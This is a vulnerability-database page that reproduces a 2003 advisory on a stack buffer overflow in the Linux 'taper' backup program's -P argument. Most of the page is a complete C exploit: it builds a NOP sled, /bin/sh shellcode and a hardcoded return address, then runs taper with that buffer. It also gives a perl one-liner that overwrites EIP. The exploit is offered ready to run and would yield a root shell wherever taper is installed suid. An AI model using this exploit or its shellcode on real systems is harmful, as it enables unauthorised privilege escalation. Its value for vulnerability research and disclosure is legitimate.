Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

taper.txt

🗓️ 30 Oct 2003 00:00:00Reported by PolygrithmType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Stack overflow vulnerability in Taper program on Linux potentially impacting multiple distributions.

Code
`  
  
HI,  
There is a stack overflow vulnerability in taper program of linux   
7.3 (may be others)..  
On linux 7.3 its not suid by default. But i dont know about other distro/ver   
. may be its  
suid on others..  
  
Advisory:  
  
------------------------------------------------------------------------------------------------------------------------------  
gEEkz-advisory  
NrAziz(c) 2003  
nraziz_at_geekz_nl  
polygrithm_at_hotmail  
http://geekz.nl  
  
--{0x01 Introduction:  
  
Taper is a user friendly archive program especially designed  
for backing up to tape drives. It also supports backing up to files  
on a hard disk.  
  
--{0x02 Vulnerability:  
  
taper has a vulnerability in its argument to -P .By giving a large  
string it overwrites the eip..  
e.g taper `perl -e 'print "A" x 2708'` over writes the eip. It may have   
other possible vulnerabilites because  
of the usage of many strcpy's. Taper by default is none-suid on Linux   
7.3,However if its suid  
on any other distro/ver please let me know then..  
  
--{0x03 Greetz:  
  
To gEEkz team,rave,gorny,and other m8s  
  
------------------------------------------------------------------------------------------------------------------------------  
  
Exploit:  
  
------------------------------------------------------------------------------------------------------------------------------  
/* gEEkz-taper-xploit */  
/*  
* Copyright(C) 2003 NrAziz  
* nraziz^at^geekz^nl  
*/  
#include <stdio.h>  
#include <stdlib.h>  
  
/* /bin/sh */  
char shellcode[]=  
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"  
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"  
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"  
"\x80\xb0\x01\x31\xdb\xcd\x80";  
#define B_SIZE 2708  
int main(int argc,char **argv)  
{  
char buffer[B_SIZE];  
int i;  
u_long ret=0xbffff250;  
  
memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);  
buffer[B_SIZE-4]=(ret & 0x000000ff);  
buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;  
buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;  
buffer[B_SIZE-1]=(ret & 0xff000000)>>24;  
buffer[B_SIZE-0]=0;  
memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));  
  
execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);  
return 0;  
}  
  
  
  
---------------------------------------------------------------------------------------------------------------------------------------  
  
REgards,  
NrAziz  
  
_________________________________________________________________  
Add photos to your e-mail with MSN 8. Get 2 months FREE*.   
http://join.msn.com/?page=features/featuredemail  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2003 00:00Current
7.4High risk
Vulners AI Score7.4
linux seven point threestack overflow vulnerabilitytaper programnon suidexploitation code.
35